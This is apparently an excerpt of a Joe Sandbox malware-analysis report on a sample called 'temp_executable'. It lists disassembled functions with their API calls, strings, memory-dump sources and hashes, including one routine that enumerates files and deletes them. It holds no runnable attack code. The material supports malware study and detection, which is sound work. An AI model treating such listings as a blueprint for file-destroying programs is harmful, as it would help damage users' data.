Opcode Fuzzy Hash: ec3a1ade1027db9626b75a3e96ae7507dc867012919d4a2d0e5f0bc9220c91d0
Instruction Fuzzy Hash: 68D13235908345DFEF02DFA8C400AAEBBF5FF09350F098189E495AB712D73A9985CB10

Function 00405451 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,00435400,764D3410,00000000), ref: 0040547A
lstrcatA.KERNEL32(0042A828,\*.*,0042A828,?,?,00435400,764D3410,00000000), ref: 004054C2
lstrcatA.KERNEL32(?,00409014,?,0042A828,?,?,00435400,764D3410,00000000), ref: 004054E3
lstrlenA.KERNEL32(?,?,00409014,?,0042A828,?,?,00435400,764D3410,00000000), ref: 004054E9
FindFirstFileA.KERNEL32(0042A828,?,?,?,00409014,?,0042A828,?,?,00435400,764D3410,00000000), ref: 004054FA
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004055A7
FindClose.KERNEL32(00000000), ref: 004055B8

Strings

\*.*, xrefs: 004054BC

Memory Dump Source

Source File: 00000002.00000002.13500514197.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.13500419295.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500613130.0000000000407000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500695429.0000000000409000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.13500755233.0000000000445000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_executable.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 6349f3dff572452614f878026353f92d633d12771a0199604bde9a196fc5ff50
Instruction ID: aa82d0309f1ddddfbe6c40bd1d7433d9f6730d94ca5b26b608a9a455718634cb
Opcode Fuzzy Hash: 6349f3dff572452614f878026353f92d633d12771a0199604bde9a196fc5ff50
Instruction Fuzzy Hash: 9D51D030900A04BADB216B618C45BBF7AB9DF86715F14407BF444B61D2D73C9982DEAE

Function 339AF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339AF0D6

Strings

RtlAllocateHeap, xrefs: 339AF0ED
Just allocated block at %p for %Ix bytes, xrefs: 339AF288
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 339AF33E
HEAP[%wZ]: , xrefs: 339AF267, 339AF314, 339AF36B
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 339AF389
HEAP: , xrefs: 339AF274, 339AF321, 339AF378

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 3f65e99e6a492ea3bd3b89299fd68b5154fd598c59bb8f59e0d8cb3470eeed43
Instruction ID: ff13de661676a97a8430fed3782a0fefe93464957b37033dad07aa799e9ce97b
Opcode Fuzzy Hash: 3f65e99e6a492ea3bd3b89299fd68b5154fd598c59bb8f59e0d8cb3470eeed43
Instruction Fuzzy Hash: 0B913635A05744DFDB02DFACC840A9DBBF5FF49390F088659E452ABB52CB769941CB10

Function 338FD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 338FD389
PreferredUILanguagesPending, xrefs: 3395A66D
@, xrefs: 338FD43D
Control Panel\Desktop, xrefs: 338FD3FD
MachinePreferredUILanguages, xrefs: 338FD625
@, xrefs: 338FD603
Control Panel\Desktop\MuiCached, xrefs: 338FD5CB
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 338FD356
PreferredUILanguages, xrefs: 338FD458, 338FD465

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 5f1514e1099c083425565e327448c159cad7d349d8c6edd6cb032e9edb23fdc6
Instruction ID: 87c72805e6b00eccc054e733eed27e75521ea0d90bec08fb49980b3be1f945e2
Opcode Fuzzy Hash: 5f1514e1099c083425565e327448c159cad7d349d8c6edd6cb032e9edb23fdc6
Instruction Fuzzy Hash: F0B1BFB6909345DFE711CFA4D440A5FB7E8AB88788F44492EFA88D7244DB31D948CB92

Function 3392D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3392D879

Part of subcall function 33904779: RtlDebugPrintTimes.NTDLL ref: 33904817

Strings

$, xrefs: 3392D820
$, xrefs: 3392D78D
minkernel\ntdll\ldrinit.c, xrefs: 3396F0E2
LdrShutdownProcess, xrefs: 3396F0D8
Process 0x%p (%wZ) exiting, xrefs: 3396F0D1

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1975516107
Opcode ID: 05949231e766e439755250625c7f46ef0565386f3026e0ff11a782f850300a7e
Instruction ID: c98f8d91d9fc5f2f8bc5ddc86a4bef6aaed5e0e8a05996e85a86603a53beeea4
Opcode Fuzzy Hash: 05949231e766e439755250625c7f46ef0565386f3026e0ff11a782f850300a7e
Instruction Fuzzy Hash: D351DBB5E08B49CFEB14EFA8C48078DBBF9FF44354F244159C810AB296D774A982CB80

Function 338FD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 338FD2B3
Control Panel\Desktop\LanguageConfiguration, xrefs: 338FD136
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 338FD202
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 338FD263
@, xrefs: 338FD09D
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 338FD0E6
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 338FD06F
@, xrefs: 338FD24F

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: a6a4926c5f00e91d54521fd606c06ddfed5971dcdec2fda3cbee57ceefd0708c
Instruction ID: c086e2494f1b5c07b9b9cd66eeae305b97c2f276956597de4f127fc3a41bee73
Opcode Fuzzy Hash: a6a4926c5f00e91d54521fd606c06ddfed5971dcdec2fda3cbee57ceefd0708c
Instruction Fuzzy Hash: FCA158B1908345DFE321CF64D480B9FB7E8BB84759F00492EFA9896241EB75D948CB93

Function 339AF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

Specified HeapBase (%p) invalid, Status = %lx, xrefs: 339AF664
Invalid ReserveSize parameter - %Ix, xrefs: 339AF56B
Specified HeapBase (%p) is free or not writable, xrefs: 339AF6F8
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 339AF5FB
HEAP[%wZ]: , xrefs: 339AF552, 339AF597, 339AF5E3, 339AF648, 339AF696, 339AF6DD
Invalid CommitSize parameter - %Ix, xrefs: 339AF5B2
HEAP: , xrefs: 339AF55F, 339AF5A4, 339AF5F0, 339AF655, 339AF6A3, 339AF6EA
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 339AF6B2

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: 1fe8fa699a644801ffc0810adc999a50f05eacc2b0c2c22d1d8161fb5a9bd69c
Instruction ID: 1e749f350481cfa09c4ff3272e8e16ab5fcde55fdd172c72810b017118f00ed6
Opcode Fuzzy Hash: 1fe8fa699a644801ffc0810adc999a50f05eacc2b0c2c22d1d8161fb5a9bd69c
Instruction Fuzzy Hash: E851E236A12348EFD712DFECDC44E1A77A8EF047A4F14869AF4529B722DA76D940CA10

Function 3392237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 33922382
LdrpDynamicShimModule, xrefs: 3396A7A5
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3396A79F
minkernel\ntdll\ldrinit.c, xrefs: 3396A7AF

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 48bf6cd04e96db47eb63795f29ec0227e50b3eedbc2b5f2156ba7b6bb5ee0e44
Instruction ID: 5e7cfca7549b92ce482fc135dd408c640790d9099b175be652afd102ea06fa33
Opcode Fuzzy Hash: 48bf6cd04e96db47eb63795f29ec0227e50b3eedbc2b5f2156ba7b6bb5ee0e44
Instruction Fuzzy Hash: FD31F6B6E05304EFF710AF59C880E9A77F9EB84BA4F140069E911BB251DB74A942CB50

Function 338FF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 3395E138
((LONG)FreeEntry->Size > 1), xrefs: 3395DE42
(LONG)FreeEntry->Size > 1, xrefs: 3395E020
HEAP[%wZ]: , xrefs: 3395DCE6, 3395DE2A, 3395E008, 3395E120
HEAP: , xrefs: 3395DCF3, 3395DE37, 3395E015, 3395E12D
(UCRBlock != NULL), xrefs: 3395DCFE

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 1016c7ae40f2baa46ca9d4ecf36ac2d7ec230a9206a3854ea861412604452d0a
Instruction ID: c8932ed21a1fbe90264d6d03a8bf254287dbadde91a0fb7f110c5e3b59a86e09
Opcode Fuzzy Hash: 1016c7ae40f2baa46ca9d4ecf36ac2d7ec230a9206a3854ea861412604452d0a
Instruction Fuzzy Hash: 6442E075608381DFE301CF68D884A6ABBE9FF88244F084A69F895CB752DB31D985CB51

Function 3391B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName, xrefs: 33968210, 339682E4
API set, xrefs: 33968201, 33968206
minkernel\ntdll\ldrutil.c, xrefs: 3396821A, 339682EE
SxS, xrefs: 339681FA
DLL %wZ was redirected to %wZ by %s, xrefs: 33968209
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 339682DD

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: de741045b7bcda1d832e94b1bb9fa27a5902fb261cfc7a004c6a48d5a34302f4
Instruction ID: d9697db6e33c2679aa460e9b372d44a7e7f562868ae727ee299a236cae1d4fcb
Opcode Fuzzy Hash: de741045b7bcda1d832e94b1bb9fa27a5902fb261cfc7a004c6a48d5a34302f4
Instruction Fuzzy Hash: 71C17B75E0530DDBEB148B64C890B7FB7AAAF45394F5840A9D842FB291DBB4CC69C390

Function 33932594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 33971F8A
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 33971FA9
RtlGetAssemblyStorageRoot, xrefs: 33971F6A, 33971FA4, 33971FC4
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 33971F82
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 33971FC9
SXS: %s() passed the empty activation context, xrefs: 33971F6F

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: a4e6cf26fd33eb94ed62fbaa2e020e93d9b87ab203b56dd8727ef703cfa8806c
Instruction ID: 2b3814a8bcd579cdb3de6afc1bbc93d832c37f83bec102f2c2c3d21e1df94e41
Opcode Fuzzy Hash: a4e6cf26fd33eb94ed62fbaa2e020e93d9b87ab203b56dd8727ef703cfa8806c
Instruction Fuzzy Hash: 373109B6E02224FFE7209AD5DC54F5B776CEF52794F040055F9506B242D770AE01CBA5

Function 33910680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 33964ED7
HEAP[%wZ]: , xrefs: 33964EBB
HEAP: , xrefs: 33964ECA

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 62055fb1a734f6cd5910dcfb19ab91f1d210aac96d9baa216571d28f0e38be3b
Instruction ID: 7c98494c8962f3656e8126567c8ef0f8f0d282bfb83a9af316f2e99b57b45312
Opcode Fuzzy Hash: 62055fb1a734f6cd5910dcfb19ab91f1d210aac96d9baa216571d28f0e38be3b
Instruction Fuzzy Hash: EFF10E74A01709DFEB14CF69C880B6AB7F9FF44384F1481A8E415AB781D73AE991CB90

Function 33929723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33929922

Strings

LdrpUnloadNode, xrefs: 3396DAF5
Unmapping DLL "%wZ", xrefs: 3396DAEE
minkernel\ntdll\ldrsnap.c, xrefs: 3396DAFF

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: 6da3665990796e924c0cfea3c002c03f6acd6ad4648eb164fd71d5fe6c539a6a
Instruction ID: 22845644e3a3c26be5f0c193c3cf6efb1551f7db00acace59a2c99bb4af7f7e7
Opcode Fuzzy Hash: 6da3665990796e924c0cfea3c002c03f6acd6ad4648eb164fd71d5fe6c539a6a
Instruction Fuzzy Hash: 3E512575A05F09DFE310EF38C880B197BADBF84354F18066CE991DB69ADB709825CB91

Function 3393C640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3393C6DF

Strings

Failed to reallocate the system dirs string !, xrefs: 339780E2
minkernel\ntdll\ldrinit.c, xrefs: 339780F3
LdrpInitializePerUserWindowsDirectory, xrefs: 339780E9

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 59456f5ddb3e7ca6ba1509849255f63eb044264e159e1101a81cce3001258864
Instruction ID: b369df302cfe02319ad75557996620c6e1b1e02cf5d52315f1a0ba2940594ae5
Opcode Fuzzy Hash: 59456f5ddb3e7ca6ba1509849255f63eb044264e159e1101a81cce3001258864
Instruction Fuzzy Hash: BC41C1B5A49705EBE710FB64D840B4B77ECEF856A5F00482AB858EB291EB74D8018F91

Function 339843D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 33984489

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 33984519
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 33984508
LdrpCheckRedirection, xrefs: 3398450F

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: a6224ff6588ca3ad3648dfe807572f7bdd3bcfb384d38bf09e9fa95c30fe85d1
Instruction ID: 32ec88573b669744655c98eb60c53fb142057f2668d5d5d2e2f75a55b2935a35
Opcode Fuzzy Hash: a6224ff6588ca3ad3648dfe807572f7bdd3bcfb384d38bf09e9fa95c30fe85d1
Instruction Fuzzy Hash: 1E419E76A05711DFDB10DFB8C840A1677E8EFC8790F4A0659EC98AF352E730E8808B91

Function 3392510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 3392514A
Kernel-MUI-Language-Disallowed, xrefs: 33925272
Kernel-MUI-Language-SKU, xrefs: 3392534B
Kernel-MUI-Language-Allowed, xrefs: 3392519B
Kernel-MUI-Number-Allowed, xrefs: 33925167

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 49c223a84c6d71a496bee16aa228554a9e68bfc038ebea371f971dbe9cc01879
Instruction ID: ce88008d435a6d5aa8bb09b55891a439f403128639ee7934d4f0b1539f40d21c
Opcode Fuzzy Hash: 49c223a84c6d71a496bee16aa228554a9e68bfc038ebea371f971dbe9cc01879
Instruction Fuzzy Hash: 74F13AB6D0161DEFDB11DF99C980EAEBBBCEF08650F54406AE501E7615EB709E01CBA0

Function 339DACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339DAEA9
RtlDebugPrintTimes.NTDLL ref: 339DB185

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 667f4854d9246557ed4505e095d8145e1fee9d03c2ad70d8529a26dba847ab8a
Instruction ID: 6253a3a5bd7dd4c9325651328ebd0e3888798f3a16c715c9a31906b4b7172b68
Opcode Fuzzy Hash: 667f4854d9246557ed4505e095d8145e1fee9d03c2ad70d8529a26dba847ab8a
Instruction Fuzzy Hash: 35F10677E00211CFCB18CF6CC99167EBBF9AF88250B59816DD496EB385D634E941CB50

Function 338F7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 3395ADA5
, passed to %s, xrefs: 3395ADCF
Invalid heap signature for heap at %p, xrefs: 3395ADBE
HEAP: , xrefs: 3395ADB2
RtlFreeHeap, xrefs: 3395ADCE

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: 7e3566862cc6a1bb223797586bc56d3209ad14cf59abaa0e189b8b8c82b396bb
Instruction ID: 50570cf98eaa2ffd0652475b62f82208124a0409d48b1b7feb55f112a13a5aff
Opcode Fuzzy Hash: 7e3566862cc6a1bb223797586bc56d3209ad14cf59abaa0e189b8b8c82b396bb
Instruction Fuzzy Hash: 32014C37506244DEF307E7ACF408F4277D8DB41771F18408AF0504BB91DA969884DA54

Function 33900485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 339005D6

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 33900586
kLsE, xrefs: 339005FE

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID: DebugPrintTimes
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 3446177414-2547482624
Opcode ID: 56acf2400b6451eac14beaf0281f90b3bdf2f77c465afbc6f9ee34dcf9ddfd7c
Instruction ID: ffce6ec2006d851de27a47445ec1042a429166ae425c388eff0841548cb2a4ff
Opcode Fuzzy Hash: 56acf2400b6451eac14beaf0281f90b3bdf2f77c465afbc6f9ee34dcf9ddfd7c
Instruction Fuzzy Hash: A351CCB5A0074ADFE720EFA6C4406EAB7F8AF04340F05843ED59987741EB389945CFA1

Function 3390A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 3390A30F
6, xrefs: 3390A317
LdrResFallbackLangList Exit, xrefs: 3390A31F
8, xrefs: 3390A307

Memory Dump Source

Source File: 00000002.00000002.13518070273.00000000338D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 338D0000, based on PE: true

Associated: 00000002.00000002.13518070273.00000000339F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13518070273.00000000339FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_338d0000_temp_executable.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 31c8555898318ce31cd34d4345c9522afa440908099bd88e00921e074d1fd3b6
Instruction ID: 010d9c5c0f9e2683675c911e28f87f6c69628b3c172dc7f84866bfe04231d4b9
Opcode Fuzzy Hash: 31c8555898318ce31cd34d4345c9522afa440908099bd88e00921e074d1fd3b6
